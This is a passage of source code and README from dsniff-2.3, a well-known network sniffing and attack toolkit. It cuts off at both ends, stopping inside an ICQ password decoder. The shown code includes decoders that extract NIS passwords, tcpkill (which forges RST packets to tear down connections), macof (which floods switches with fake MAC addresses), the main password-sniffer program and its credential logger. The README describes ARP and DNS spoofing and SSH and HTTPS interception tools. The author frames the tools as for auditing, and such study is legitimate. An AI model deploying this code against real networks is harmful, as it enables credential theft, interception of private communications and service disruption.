66 | 67 | return (FALSE); 68 | } 69 | 70 | int 71 | decode_yppasswd(u_char *buf, int len, u_char *obuf, int olen) 72 | { 73 | struct rpc_msg msg; 74 | struct my_yppasswd yp; 75 | XDR xdrs; 76 | int hdrlen; 77 | 78 | if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) 79 | return (0); 80 | 81 | obuf[0] = '\0'; 82 | 83 | if (msg.rm_direction == CALL && 84 | msg.rm_call.cb_prog == YPPASSWDPROG && 85 | msg.rm_call.cb_proc == YPPASSWDPROC_UPDATE) { 86 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); 87 | memset(&yp, 0, sizeof(yp)); 88 | if (xdr_my_yppasswd(&xdrs, &yp)) { 89 | snprintf(obuf, olen, 90 | "%s\n%s:%s:%d:%d:%s:%s:%s\n", 91 | yp.oldpass, yp.newpw.pw_name, 92 | yp.newpw.pw_passwd, yp.newpw.pw_uid, 93 | yp.newpw.pw_gid, yp.newpw.pw_gecos, 94 | yp.newpw.pw_dir, yp.newpw.pw_shell); 95 | } 96 | xdr_destroy(&xdrs); 97 | } 98 | return (strlen(obuf)); 99 | } 100 | 101 | int 102 | decode_ypserv(u_char *buf, int len, u_char *obuf, int olen) 103 | { 104 | struct rpc_msg msg; 105 | struct xid_map *xm; 106 | char *domain; 107 | bool_t status; 108 | XDR xdrs; 109 | int hdrlen; 110 | 111 | if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) 112 | return (0); 113 | 114 | obuf[0] = '\0'; 115 | 116 | if (msg.rm_direction == CALL && 117 | msg.rm_call.cb_prog == YPPROG && 118 | msg.rm_call.cb_proc == YPPROC_DOMAIN) { 119 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); 120 | domain = NULL; 121 | if (xdr_string(&xdrs, &domain, YPMAXDOMAIN)) { 122 | if ((domain = strdup(domain)) != NULL) 123 | xid_map_enter(msg.rm_xid, YPPROG, YPVERS, 124 | YPPROC_DOMAIN, (void *) domain); 125 | } 126 | xdr_destroy(&xdrs); 127 | } 128 | else if (msg.rm_direction == REPLY && 129 | (xm = xid_map_find(msg.rm_xid)) != NULL) { 130 | if (msg.rm_reply.rp_stat == MSG_ACCEPTED && 131 | msg.acpted_rply.ar_stat == SUCCESS) { 132 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, 133 | XDR_DECODE); 134 | if (xdr_bool(&xdrs, &status)) { 135 | if (status == TRUE) 136 | snprintf(obuf, olen, "%s\n", 137 | (char *)xm->data); 138 | } 139 | xdr_destroy(&xdrs); 140 | } 141 | free(xm->data); 142 | memset(xm, 0, sizeof(*xm)); 143 | } 144 | return (strlen(obuf)); 145 | } 146 | -------------------------------------------------------------------------------- /tcpkill.c: -------------------------------------------------------------------------------- 1 | /* 2 | * tcpkill.c 3 | * 4 | * Kill TCP connections already in progress. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: tcpkill.c,v 1.17 2001/03/17 08:10:43 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | #include "pcaputil.h" 24 | #include "version.h" 25 | 26 | #define DEFAULT_SEVERITY 3 27 | 28 | int Opt_severity = DEFAULT_SEVERITY; 29 | int pcap_off; 30 | 31 | static void 32 | usage(void) 33 | { 34 | fprintf(stderr, "Version: " VERSION "\n" 35 | "Usage: tcpkill [-i interface] [-1..9] expression\n"); 36 | exit(1); 37 | } 38 | 39 | static void 40 | tcp_kill_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt) 41 | { 42 | struct libnet_ip_hdr *ip; 43 | struct libnet_tcp_hdr *tcp; 44 | u_char ctext[64], buf[IP_H + TCP_H]; 45 | u_int32_t seq, win; 46 | int i, *sock, len; 47 | 48 | sock = (int *)user; 49 | pkt += pcap_off; 50 | len = pcap->caplen - pcap_off; 51 | 52 | ip = (struct libnet_ip_hdr *)pkt; 53 | if (ip->ip_p != IPPROTO_TCP) 54 | return; 55 | 56 | tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2)); 57 | if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST)) 58 | return; 59 | 60 | libnet_build_ip(TCP_H, 0, 0, 0, 64, IPPROTO_TCP, 61 | ip->ip_dst.s_addr, ip->ip_src.s_addr, 62 | NULL, 0, buf); 63 | 64 | libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport), 65 | 0, 0, TH_RST, 0, 0, NULL, 0, buf + IP_H); 66 | 67 | seq = ntohl(tcp->th_ack); 68 | win = ntohs(tcp->th_win); 69 | 70 | snprintf(ctext, sizeof(ctext), "%s:%d > %s:%d:", 71 | libnet_host_lookup(ip->ip_src.s_addr, 0), 72 | ntohs(tcp->th_sport), 73 | libnet_host_lookup(ip->ip_dst.s_addr, 0), 74 | ntohs(tcp->th_dport)); 75 | 76 | ip = (struct libnet_ip_hdr *)buf; 77 | tcp = (struct libnet_tcp_hdr *)(ip + 1); 78 | 79 | for (i = 0; i < Opt_severity; i++) { 80 | ip->ip_id = libnet_get_prand(PRu16); 81 | seq += (i * win); 82 | tcp->th_seq = htonl(seq); 83 | 84 | libnet_do_checksum(buf, IPPROTO_TCP, TCP_H); 85 | 86 | if (libnet_write_ip(*sock, buf, sizeof(buf)) < 0) 87 | warn("write_ip"); 88 | 89 | fprintf(stderr, "%s R %lu:%lu(0) win 0\n", ctext, seq, seq); 90 | } 91 | } 92 | 93 | int 94 | main(int argc, char *argv[]) 95 | { 96 | extern char *optarg; 97 | extern int optind; 98 | int c, sock; 99 | char *p, *intf, *filter, ebuf[PCAP_ERRBUF_SIZE]; 100 | pcap_t *pd; 101 | 102 | intf = NULL; 103 | 104 | while ((c = getopt(argc, argv, "i:123456789h?V")) != -1) { 105 | switch (c) { 106 | case 'i': 107 | intf = optarg; 108 | break; 109 | case '0': case '1': case '2': case '3': case '4': 110 | case '5': case '6': case '7': case '8': case '9': 111 | p = argv[optind - 1]; 112 | if (p[0] == '-' && p[1] == c && p[2] == '\0') 113 | Opt_severity = atoi(++p); 114 | else 115 | Opt_severity = atoi(argv[optind] + 1); 116 | break; 117 | default: 118 | usage(); 119 | break; 120 | } 121 | } 122 | if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) 123 | errx(1, "%s", ebuf); 124 | 125 | argc -= optind; 126 | argv += optind; 127 | 128 | if (argc == 0) 129 | usage(); 130 | 131 | filter = copy_argv(argv); 132 | 133 | if ((pd = pcap_init(intf, filter, 64)) == NULL) 134 | errx(1, "couldn't initialize sniffing"); 135 | 136 | if ((pcap_off = pcap_dloff(pd)) < 0) 137 | errx(1, "couldn't determine link layer offset"); 138 | 139 | if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1) 140 | errx(1, "couldn't initialize sending"); 141 | 142 | libnet_seed_prand(); 143 | 144 | warnx("listening on %s [%s]", intf, filter); 145 | 146 | pcap_loop(pd, -1, tcp_kill_cb, (u_char *)&sock); 147 | 148 | /* NOTREACHED */ 149 | 150 | exit(0); 151 | } 152 | -------------------------------------------------------------------------------- /macof.c: -------------------------------------------------------------------------------- 1 | /* 2 | * macof.c 3 | * 4 | * C port of macof-1.1 from the Perl Net::RawIP distribution. 5 | * Tests network devices by flooding local network with MAC-addresses. 6 | * 7 | * Perl macof originally written by Ian Vitek . 8 | * 9 | * Copyright (c) 1999 Dug Song 10 | * 11 | * $Id: macof.c,v 1.15 2001/03/15 08:33:04 dugsong Exp $ 12 | */ 13 | 14 | #include "config.h" 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | #include "version.h" 27 | 28 | extern char *ether_ntoa(struct ether_addr *); 29 | extern struct ether_addr *ether_aton(char *); 30 | 31 | in_addr_t Src = 0; 32 | in_addr_t Dst = 0; 33 | u_char *Tha = NULL; 34 | u_short Dport = 0; 35 | u_short Sport = 0; 36 | char *Intf = NULL; 37 | int Repeat = -1; 38 | 39 | static void 40 | usage(void) 41 | { 42 | fprintf(stderr, "Version: " VERSION "\n" 43 | "Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport]" 44 | "\n [-i interface] [-n times]\n"); 45 | exit(1); 46 | } 47 | 48 | static void 49 | gen_mac(u_char *mac) 50 | { 51 | *((in_addr_t *)mac) = libnet_get_prand(PRu32); 52 | *((u_short *)(mac + 4)) = libnet_get_prand(PRu16); 53 | } 54 | 55 | int 56 | main(int argc, char *argv[]) 57 | { 58 | extern char *optarg; 59 | extern int optind; 60 | int c, i; 61 | struct libnet_link_int *llif; 62 | char ebuf[PCAP_ERRBUF_SIZE]; 63 | u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN]; 64 | in_addr_t src, dst; 65 | u_short sport, dport; 66 | u_int32_t seq; 67 | u_char pkt[ETH_H + IP_H + TCP_H]; 68 | 69 | while ((c = getopt(argc, argv, "vs:d:e:x:y:i:n:h?V")) != -1) { 70 | switch (c) { 71 | case 'v': 72 | break; 73 | case 's': 74 | Src = libnet_name_resolve(optarg, 0); 75 | break; 76 | case 'd': 77 | Dst = libnet_name_resolve(optarg, 0); 78 | break; 79 | case 'e': 80 | Tha = (u_char *)ether_aton(optarg); 81 | break; 82 | case 'x': 83 | Sport = atoi(optarg); 84 | break; 85 | case 'y': 86 | Dport = atoi(optarg); 87 | break; 88 | case 'i': 89 | Intf = optarg; 90 | break; 91 | case 'n': 92 | Repeat = atoi(optarg); 93 | break; 94 | default: 95 | usage(); 96 | } 97 | } 98 | argc -= optind; 99 | argv += optind; 100 | 101 | if (argc != 0) 102 | usage(); 103 | 104 | if (!Intf && (Intf = pcap_lookupdev(ebuf)) == NULL) 105 | errx(1, "%s", ebuf); 106 | 107 | if ((llif = libnet_open_link_interface(Intf, ebuf)) == 0) 108 | errx(1, "%s", ebuf); 109 | 110 | libnet_seed_prand(); 111 | 112 | for (i = 0; i != Repeat; i++) { 113 | 114 | gen_mac(sha); 115 | 116 | if (Tha == NULL) gen_mac(tha); 117 | else memcpy(tha, Tha, sizeof(tha)); 118 | 119 | if (Src != 0) src = Src; 120 | else src = libnet_get_prand(PRu32); 121 | 122 | if (Dst != 0) dst = Dst; 123 | else dst = libnet_get_prand(PRu32); 124 | 125 | if (Sport != 0) sport = Sport; 126 | else sport = libnet_get_prand(PRu16); 127 | 128 | if (Dport != 0) dport = Dport; 129 | else dport = libnet_get_prand(PRu16); 130 | 131 | seq = libnet_get_prand(PRu32); 132 | 133 | libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, pkt); 134 | 135 | libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 64, 136 | IPPROTO_TCP, src, dst, NULL, 0, pkt + ETH_H); 137 | 138 | libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512, 139 | 0, NULL, 0, pkt + ETH_H + IP_H); 140 | 141 | libnet_do_checksum(pkt + ETH_H, IPPROTO_IP, IP_H); 142 | libnet_do_checksum(pkt + ETH_H, IPPROTO_TCP, TCP_H); 143 | 144 | if (libnet_write_link_layer(llif, Intf, pkt, sizeof(pkt)) < 0) 145 | errx(1, "write"); 146 | 147 | fprintf(stderr, "%s ", 148 | ether_ntoa((struct ether_addr *)sha)); 149 | fprintf(stderr, "%s %s.%d > %s.%d: S %u:%u(0) win 512\n", 150 | ether_ntoa((struct ether_addr *)tha), 151 | libnet_host_lookup(Src, 0), sport, 152 | libnet_host_lookup(Dst, 0), dport, seq, seq); 153 | } 154 | exit(0); 155 | } 156 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | 2 | dsniff-2.3 3 | ---------- 4 | 5 | i wrote these tools with honest intentions - to audit my own network, 6 | and to demonstrate the insecurity of cleartext / weakly-encrypted 7 | network protocols and ad-hoc PKI. please do not abuse this software. 8 | 9 | these programs require: 10 | 11 | Berkeley DB - http://www.sleepycat.com/ 12 | OpenSSL - http://www.openssl.org/ 13 | libpcap - http://www.tcpdump.org/ 14 | libnids - http://www.packetfactory.net/Projects/Libnids/ 15 | libnet - http://www.packetfactory.net/Projects/Libnet/ 16 | 17 | built and tested on OpenBSD, Linux, and Solaris. YMMV. 18 | 19 | what's here: 20 | 21 | arpspoof 22 | redirect packets from a target host (or all hosts) on the LAN 23 | intended for another local host by forging ARP replies. this 24 | is an extremely effective way of sniffing traffic on a switch. 25 | kernel IP forwarding (or a userland program which accomplishes 26 | the same, e.g. fragrouter :-) must be turned on ahead of time. 27 | 28 | dnsspoof 29 | forge replies to arbitrary DNS address / pointer queries on 30 | the LAN. this is useful in bypassing hostname-based access 31 | controls, or in implementing a variety of man-in-the-middle 32 | attacks (HTTP, HTTPS, SSH, Kerberos, etc). 33 | 34 | dsniff 35 | password sniffer. handles FTP, Telnet, SMTP, HTTP, POP, 36 | poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP 37 | MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, 38 | Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec 39 | pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase 40 | and Microsoft SQL auth info. 41 | 42 | dsniff automatically detects and minimally parses each 43 | application protocol, only saving the interesting bits, and 44 | uses Berkeley DB as its output file format, only logging 45 | unique authentication attempts. full TCP/IP reassembly is 46 | provided by libnids(3) (likewise for the following tools as 47 | well). 48 | 49 | filesnarf 50 | saves selected files sniffed from NFS traffic in the current 51 | working directory. 52 | 53 | macof 54 | flood the local network with random MAC addresses (causing 55 | some switches to fail open in repeating mode, facilitating 56 | sniffing). a straight C port of the original Perl Net::RawIP 57 | macof program. 58 | 59 | mailsnarf 60 | a fast and easy way to violate the Electronic Communications 61 | Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs 62 | selected messages sniffed from SMTP and POP traffic in Berkeley 63 | mbox format, suitable for offline browsing with your favorite 64 | mail reader (mail -f, pine, etc.). 65 | 66 | msgsnarf 67 | record selected messages from sniffed AOL Instant Messenger, 68 | ICQ 2000, IRC, and Yahoo! Messenger chat sessions. 69 | 70 | sshmitm 71 | SSH monkey-in-the-middle. proxies and sniffs SSH traffic 72 | redirected by dnsspoof(8), capturing SSH password logins, and 73 | optionally hijacking interactive sessions. only SSH protocol 74 | version 1 is (or ever will be) supported - this program is far 75 | too evil already. 76 | 77 | sshow 78 | SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2 79 | traffic, identifying authentication attempts, the lengths of 80 | passwords entered in interactive sessions, and command line 81 | lengths. 82 | 83 | tcpkill 84 | kills specified in-progress TCP connections (useful for 85 | libnids-based applications which require a full TCP 3-whs for 86 | TCB creation). 87 | 88 | tcpnice 89 | slow down specified TCP connections via "active" traffic 90 | shaping. forges tiny TCP window advertisements, and optionally 91 | ICMP source quench replies. 92 | 93 | urlsnarf 94 | output selected URLs sniffed from HTTP traffic in CLF 95 | (Common Log Format, used by almost all web servers), suitable 96 | for offline post-processing with your favorite web log 97 | analysis tool (analog, wwwstat, etc.). 98 | 99 | webmitm 100 | HTTP / HTTPS monkey-in-the-middle. transparently proxies and 101 | sniffs web traffic redirected by dnsspoof(8), capturing most 102 | "secure" SSL-encrypted webmail logins and form submissions. 103 | 104 | webspy 105 | sends URLs sniffed from a client to your local Netscape 106 | browser for display, updated in real-time (as the target 107 | surfs, your browser surfs along with them, automagically). 108 | a fun party trick. :-) 109 | 110 | -d. 111 | 112 | --- 113 | http://www.monkey.org/~dugsong/ 114 | -------------------------------------------------------------------------------- /dsniff.c: -------------------------------------------------------------------------------- 1 | /* 2 | * dsniff.c 3 | * 4 | * Password sniffer, because DrHoney wanted one. 5 | * 6 | * This is intended for demonstration purposes and educational use only. 7 | * 8 | * Copyright (c) 2000 Dug Song 9 | * 10 | * $Id: dsniff.c,v 1.69 2001/03/15 08:33:03 dugsong Exp $ 11 | */ 12 | 13 | #include "config.h" 14 | 15 | #include 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | #include "options.h" 27 | #include "pathnames.h" 28 | #include "pcaputil.h" 29 | #include "trigger.h" 30 | #include "record.h" 31 | #include "version.h" 32 | 33 | #define MAX_LINES 6 34 | #define MIN_SNAPLEN 1024 35 | 36 | int Opt_client = 0; 37 | int Opt_debug = 0; 38 | u_short Opt_dns = 1; 39 | int Opt_magic = 0; 40 | int Opt_read = 0; 41 | int Opt_write = 0; 42 | int Opt_snaplen = MIN_SNAPLEN; 43 | int Opt_lines = MAX_LINES; 44 | 45 | static void 46 | usage(void) 47 | { 48 | fprintf(stderr, "Version: " VERSION "\n" 49 | "Usage: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen]\n" 50 | " [-f services] [-t trigger[,...]] [-r|-w savefile]\n" 51 | " [expression]\n"); 52 | exit(1); 53 | } 54 | 55 | static void 56 | sig_hup(int sig) 57 | { 58 | trigger_dump(); 59 | } 60 | 61 | static void 62 | sig_die(int sig) 63 | { 64 | record_close(); 65 | exit(0); 66 | } 67 | 68 | static void 69 | null_syslog(int type, int errnum, struct ip *iph, void *data) 70 | { 71 | } 72 | 73 | int 74 | main(int argc, char *argv[]) 75 | { 76 | extern char *optarg; 77 | extern int optind; 78 | char *services, *savefile, *triggers; 79 | int c; 80 | 81 | services = savefile = triggers = NULL; 82 | 83 | while ((c = getopt(argc, argv, "cdf:i:mnp:r:s:t:w:h?V")) != -1) { 84 | switch (c) { 85 | case 'c': 86 | Opt_client = 1; 87 | break; 88 | case 'd': 89 | Opt_debug++; 90 | break; 91 | case 'f': 92 | services = optarg; 93 | break; 94 | case 'i': 95 | nids_params.device = optarg; 96 | break; 97 | case 'm': 98 | Opt_magic = 1; 99 | break; 100 | case 'n': 101 | Opt_dns = 0; 102 | break; 103 | case 'p': 104 | nids_params.filename = optarg; 105 | break; 106 | case 'r': 107 | Opt_read = 1; 108 | savefile = optarg; 109 | break; 110 | case 's': 111 | if ((Opt_snaplen = atoi(optarg)) == 0) 112 | usage(); 113 | break; 114 | case 't': 115 | triggers = optarg; 116 | break; 117 | case 'w': 118 | Opt_write = 1; 119 | savefile = optarg; 120 | break; 121 | default: 122 | usage(); 123 | } 124 | } 125 | argc -= optind; 126 | argv += optind; 127 | 128 | if (Opt_read && Opt_write) 129 | usage(); 130 | 131 | if (!record_init(savefile)) 132 | err(1, "record_init"); 133 | 134 | signal(SIGHUP, sig_hup); 135 | signal(SIGINT, sig_die); 136 | signal(SIGTERM, sig_die); 137 | 138 | if (Opt_read) { 139 | record_dump(); 140 | record_close(); 141 | exit(0); 142 | } 143 | 144 | if (argc != 0) 145 | nids_params.pcap_filter = copy_argv(argv); 146 | nids_params.scan_num_hosts = 0; 147 | nids_params.syslog = null_syslog; 148 | 149 | if (!nids_init()) { 150 | record_close(); 151 | errx(1, "nids_init: %s", nids_errbuf); 152 | } 153 | if (Opt_magic) { 154 | trigger_init_magic(DSNIFF_LIBDIR DSNIFF_MAGIC); 155 | } 156 | if (triggers) { 157 | trigger_init_list(triggers); 158 | } 159 | if (services == NULL) { 160 | services = DSNIFF_LIBDIR DSNIFF_SERVICES; 161 | } 162 | trigger_init_services(services); 163 | 164 | nids_register_ip(trigger_ip); 165 | nids_register_ip(trigger_udp); 166 | 167 | if (Opt_client) { 168 | nids_register_ip(trigger_tcp_raw); 169 | signal(SIGALRM, trigger_tcp_raw_timeout); 170 | alarm(TRIGGER_TCP_RAW_TIMEOUT); 171 | } 172 | else nids_register_tcp(trigger_tcp); 173 | 174 | if (nids_params.pcap_filter != NULL) { 175 | if (nids_params.filename == NULL) { 176 | warnx("listening on %s [%s]", nids_params.device, 177 | nids_params.pcap_filter); 178 | } 179 | else { 180 | warnx("using %s [%s]", nids_params.filename, 181 | nids_params.pcap_filter); 182 | } 183 | } 184 | else { 185 | if (nids_params.filename == NULL) { 186 | warnx("listening on %s", nids_params.device); 187 | } 188 | else { 189 | warnx("using %s", nids_params.filename); 190 | } 191 | } 192 | 193 | nids_run(); 194 | 195 | /* NOTREACHED */ 196 | 197 | exit(0); 198 | } 199 | -------------------------------------------------------------------------------- /record.c: -------------------------------------------------------------------------------- 1 | /* 2 | * record.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: record.c,v 1.10 2001/03/15 08:33:04 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | #include 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | #ifdef HAVE_DB_185_H 19 | #define DB_LIBRARY_COMPATIBILITY_API 20 | #include 21 | #elif HAVE_DB_H 22 | #include 23 | #endif 24 | #include 25 | 26 | #include "options.h" 27 | #include "record.h" 28 | 29 | struct rec { 30 | time_t time; 31 | in_addr_t src; 32 | in_addr_t dst; 33 | u_int proto; 34 | u_short sport; 35 | u_short dport; 36 | struct netobj name; 37 | struct netobj data; 38 | }; 39 | 40 | static DB *db; 41 | 42 | static int 43 | xdr_rec(XDR *xdrs, struct rec *rec) 44 | { 45 | if (xdr_u_long(xdrs, (u_long *)&rec->time) && 46 | xdr_u_long(xdrs, (u_long *)&rec->src) && 47 | xdr_u_long(xdrs, (u_long *)&rec->dst) && 48 | xdr_u_int(xdrs, &rec->proto) && 49 | xdr_u_short(xdrs, &rec->sport) && 50 | xdr_u_short(xdrs, &rec->dport) && 51 | xdr_netobj(xdrs, &rec->name) && 52 | xdr_netobj(xdrs, &rec->data)) { 53 | return (1); 54 | } 55 | return (0); 56 | } 57 | 58 | static void 59 | record_print(struct rec *rec) 60 | { 61 | struct tm *tm; 62 | char *srcp, *dstp, *protop, tstr[24], spstr[8], dpstr[8]; 63 | struct protoent *pr; 64 | 65 | tm = localtime(&rec->time); 66 | strftime(tstr, sizeof(tstr), "%x %X", tm); 67 | 68 | srcp = libnet_host_lookup(rec->src, Opt_dns); 69 | dstp = libnet_host_lookup(rec->dst, Opt_dns); 70 | 71 | if ((pr = getprotobynumber(rec->proto)) == NULL) 72 | protop = "unknown"; 73 | else 74 | protop = pr->p_name; 75 | 76 | snprintf(spstr, sizeof(spstr), "%d", rec->sport); 77 | snprintf(dpstr, sizeof(dpstr), "%d", rec->dport); 78 | 79 | printf("-----------------\n"); 80 | printf("%s %s %s%s%s -> %s%s%s (%.*s)\n", 81 | tstr, protop, 82 | srcp, rec->sport ? "." : "", rec->sport ? spstr : "", 83 | dstp, rec->dport ? "." : "", rec->dport ? dpstr : "", 84 | (int) rec->name.n_len, rec->name.n_bytes); 85 | 86 | fwrite(rec->data.n_bytes, 1, rec->data.n_len, stdout); 87 | printf("\n"); 88 | 89 | fflush(stdout); 90 | } 91 | 92 | static DBT * 93 | record_hash(struct rec *rec) 94 | { 95 | static DBT key; 96 | static u_char hash[16]; 97 | MD5_CTX ctx; 98 | 99 | /* Unique key: src/dst IPs, decode type, decode data. */ 100 | 101 | MD5Init(&ctx); 102 | MD5Update(&ctx, (u_char *) &rec->src, sizeof(rec->src)); 103 | MD5Update(&ctx, (u_char *) &rec->dst, sizeof(rec->dst)); 104 | MD5Update(&ctx, rec->name.n_bytes, rec->name.n_len); 105 | MD5Update(&ctx, rec->data.n_bytes, rec->data.n_len); 106 | MD5Final(hash, &ctx); 107 | 108 | key.data = hash; 109 | key.size = sizeof(hash); 110 | 111 | return (&key); 112 | } 113 | 114 | static int 115 | record_save(struct rec *rec) 116 | { 117 | DBT *key, data; 118 | XDR xdrs; 119 | u_char buf[2048]; 120 | 121 | xdrmem_create(&xdrs, buf, sizeof(buf), XDR_ENCODE); 122 | 123 | if (!xdr_rec(&xdrs, rec)) 124 | return (0); 125 | 126 | data.data = buf; 127 | data.size = xdr_getpos(&xdrs); 128 | 129 | xdr_destroy(&xdrs); 130 | 131 | key = record_hash(rec); 132 | 133 | if (db->put(db, key, &data, R_NOOVERWRITE) == 0) 134 | db->sync(db, 0); 135 | 136 | return (1); 137 | } 138 | 139 | void 140 | record_dump(void) 141 | { 142 | DBT key, data; 143 | XDR xdrs; 144 | struct rec rec; 145 | 146 | while (db->seq(db, &key, &data, R_NEXT) == 0) { 147 | memset(&rec, 0, sizeof(rec)); 148 | xdrmem_create(&xdrs, data.data, data.size, XDR_DECODE); 149 | 150 | if (xdr_rec(&xdrs, &rec)) { 151 | record_print(&rec); 152 | } 153 | xdr_destroy(&xdrs); 154 | } 155 | } 156 | 157 | int 158 | record_init(char *file) 159 | { 160 | int flags, mode; 161 | 162 | if (Opt_read) { 163 | flags = O_RDONLY; 164 | mode = 0; 165 | } 166 | else { 167 | flags = O_RDWR|O_CREAT; 168 | mode = S_IRUSR|S_IWUSR; 169 | } 170 | if ((db = dbopen(file, flags, mode, DB_BTREE, NULL)) == NULL) 171 | return (0); 172 | 173 | return (1); 174 | } 175 | 176 | int 177 | record(in_addr_t src, in_addr_t dst, int proto, u_short sport, u_short dport, 178 | char *name, u_char *buf, int len) 179 | { 180 | struct rec rec; 181 | 182 | rec.time = time(NULL); 183 | 184 | rec.src = src; 185 | rec.dst = dst; 186 | 187 | rec.proto = proto; 188 | 189 | rec.sport = sport; 190 | rec.dport = dport; 191 | 192 | rec.name.n_bytes = name; 193 | rec.name.n_len = strlen(name); 194 | 195 | rec.data.n_bytes = buf; 196 | rec.data.n_len = len; 197 | 198 | if (!Opt_read && !Opt_write) 199 | record_print(&rec); 200 | 201 | record_save(&rec); 202 | 203 | return (1); 204 | } 205 | 206 | void 207 | record_close(void) 208 | { 209 | db->close(db); 210 | } 211 | 212 | -------------------------------------------------------------------------------- /decode_icq.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_icq.c 3 | * 4 | * ICQ (note - ICQ2000 is actually AIM). 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_icq.c,v 1.7 2001/03/15 08:33:00 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "buf.h" 19 | #include "decode.h" 20 | 21 | #define ICQ2_UIN_OFFSET 6 22 | #define ICQ2_CMD_OFFSET 2 23 | #define ICQ2_PASS_OFFSET 16 24 | 25 | #define ICQ5_UIN_OFFSET 6 26 | #define ICQ5_CMD_OFFSET 14 27 | #define ICQ5_CKSUM_OFFSET 20 28 | #define ICQ5_PASS_OFFSET 34 29 | 30 | const u_char icq5_table [] = { 31 | 0x59, 0x60, 0x37, 0x6B, 0x65, 0x62, 0x46, 0x48, 0x53, 0x61, 0x4C, 32 | 0x59, 0x60, 0x57, 0x5B, 0x3D, 0x5E, 0x34, 0x6D, 0x36, 0x50, 0x3F, 33 | 0x6F, 0x67, 0x53, 0x61, 0x4C, 0x59, 0x40, 0x47, 0x63, 0x39, 0x50, 34 | 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 0x69, 0x48, 0x33, 0x31, 0x64, 35 | 0x35, 0x5A, 0x4A, 0x42, 0x56, 0x40, 0x67, 0x53, 0x41, 0x07, 0x6C, 36 | 0x49, 0x58, 0x3B, 0x4D, 0x46, 0x68, 0x43, 0x69, 0x48, 0x33, 0x31, 37 | 0x44, 0x65, 0x62, 0x46, 0x48, 0x53, 0x41, 0x07, 0x6C, 0x69, 0x48, 38 | 0x33, 0x51, 0x54, 0x5D, 0x4E, 0x6C, 0x49, 0x38, 0x4B, 0x55, 0x4A, 39 | 0x62, 0x46, 0x48, 0x33, 0x51, 0x34, 0x6D, 0x36, 0x50, 0x5F, 0x5F, 40 | 0x5F, 0x3F, 0x6F, 0x47, 0x63, 0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 41 | 0x35, 0x5A, 0x6A, 0x52, 0x6E, 0x3C, 0x51, 0x34, 0x6D, 0x36, 0x50, 42 | 0x5F, 0x5F, 0x3F, 0x4F, 0x37, 0x4B, 0x35, 0x5A, 0x4A, 0x62, 0x66, 43 | 0x58, 0x3B, 0x4D, 0x66, 0x58, 0x5B, 0x5D, 0x4E, 0x6C, 0x49, 0x58, 44 | 0x3B, 0x4D, 0x66, 0x58, 0x3B, 0x4D, 0x46, 0x48, 0x53, 0x61, 0x4C, 45 | 0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 0x55, 0x6A, 0x32, 0x3E, 0x44, 46 | 0x45, 0x52, 0x6E, 0x3C, 0x31, 0x64, 0x55, 0x6A, 0x52, 0x4E, 0x6C, 47 | 0x69, 0x48, 0x53, 0x61, 0x4C, 0x39, 0x30, 0x6F, 0x47, 0x63, 0x59, 48 | 0x60, 0x57, 0x5B, 0x3D, 0x3E, 0x64, 0x35, 0x3A, 0x3A, 0x5A, 0x6A, 49 | 0x52, 0x4E, 0x6C, 0x69, 0x48, 0x53, 0x61, 0x6C, 0x49, 0x58, 0x3B, 50 | 0x4D, 0x46, 0x68, 0x63, 0x39, 0x50, 0x5F, 0x5F, 0x3F, 0x6F, 0x67, 51 | 0x53, 0x41, 0x25, 0x41, 0x3C, 0x51, 0x54, 0x3D, 0x5E, 0x54, 0x5D, 52 | 0x4E, 0x4C, 0x39, 0x50, 0x5F, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 53 | 0x69, 0x48, 0x33, 0x51, 0x54, 0x5D, 0x6E, 0x3C, 0x31, 0x64, 0x35, 54 | 0x5A, 0x00, 0x00 55 | }; 56 | 57 | int 58 | decode_icq(u_char *buf, int len, u_char *obuf, int olen) 59 | { 60 | struct buf inbuf, outbuf; 61 | u_short version, cmd; 62 | u_int32_t uin; 63 | u_char *p; 64 | 65 | buf_init(&inbuf, buf, len); 66 | buf_init(&outbuf, obuf, olen); 67 | 68 | if 